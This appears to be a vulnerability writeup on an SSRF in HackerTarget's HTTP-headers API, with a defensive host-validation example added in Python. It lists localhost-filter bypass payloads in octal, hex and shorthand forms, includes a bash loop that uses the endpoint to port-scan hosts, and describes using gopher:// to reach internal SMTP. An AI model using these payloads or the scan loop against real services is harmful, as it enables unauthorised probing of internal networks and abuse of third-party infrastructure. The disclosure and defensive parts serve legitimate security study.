Hacking the Hackers: Leveraging an SSRF in HackerTarget

This post describes how an SSRF in HackerTarget was leveraged to send email.

https://api.hackertarget.com/httpheaders/?q=<target>

Normally the target is a third-party site address such as example.com, but the researcher found that 127.0.0.1 could be supplied instead.

Initial Fix

The fix only checked for the literal 127.0.0.1.

Bypass

0  
127.00.1  
127.0.01  
0.00.0  
0.0.00  
127.1.0.1  
127.10.1  
127.1.01  
0177.1  
0177.0001.0001  
0x0.0x0.0x0.0x0  
0000.0000.0000.0000  
0x7f.0x0.0x0.0x1  
0177.0000.0000.0001  
0177.0001.0000..0001  
0x7f.0x1.0x0.0x1  
0x7f.0x1.0x1  
localtest.me  
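The literal-string check fails because the fetching client, not the filter, decides what 0177.1 or 0x7f.0x0.0x0.0x1 means. A check that normalises and resolves the host the same way the client will, and also restricts the scheme, is shown below as an added example; it is not HackerTarget's code or part of the original writeup, and the function names and the injectable resolver are assumptions of this example.

```python
#!/usr/bin/env python3
"""Hardened replacement for a literal "127.0.0.1" string check (added example,
not HackerTarget's code): resolve the target host the way the fetching client
will, then reject loopback, private and unspecified addresses."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # rejects dict://, gopher://, file:// ...


def resolve_host(host):
    """Return the set of address strings `host` maps to.

    IPv4 literals go through libc's inet_aton so that shorthand, octal and hex
    spellings (127.1, 0177.1, 0x7f.0x0.0x0.0x1, 0) normalise exactly as they
    will when the HTTP client connects; anything else is an IPv6 literal or a
    DNS name (which is how a name like localtest.me ends up at 127.0.0.1)."""
    try:
        return {socket.inet_ntoa(socket.inet_aton(host))}
    except OSError:
        pass
    try:
        return {str(ipaddress.ip_address(host))}
    except ValueError:
        pass
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_internal(addr):
    """True for any address a fetch-on-behalf-of-user service must not reach."""
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved or addr.is_multicast)


def validate_target(url, resolver=resolve_host):
    """Return (ok, reason). `resolver` is injectable so tests need no DNS."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        addrs = {ipaddress.ip_address(a) for a in resolver(host)}
    except (OSError, ValueError):
        return False, "cannot resolve %r" % host
    for ip in sorted(addrs, key=str):  # every A/AAAA record must pass
        if is_internal(ip):
            return False, "%s resolves to internal address %s" % (host, ip)
    return True, "ok"
```

The fetch itself should then connect to the address that was validated rather than resolving the name a second time, otherwise a DNS answer that changes between the check and the connect defeats the check.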

Automation

#!/usr/bin/env bash
# Usage: ./scan.sh <host>  -- asks the SSRF endpoint to fetch host:port for every port
host="${1:?usage: $0 <host>}"
for port in $(seq 1 9999); do
    echo -e "\n\n[+] Checking Port: ${port}\n"
    curl "https://api.hackertarget.com/httpheaders/?q=http://${host}:${port}" && echo -e "\n"
done

SMTP

After a round of testing, port 25 turned out to be open. Moreover, the server supported not only http:// and https:// but also dict:// and gopher:// (see the Medium post for more protocols).

This was then used to send email.

In a nutshell, the gopher:// protocol sends 1 character, a new line (CR+LF), and the remaining data, which allows us to send a multiline request.

Ref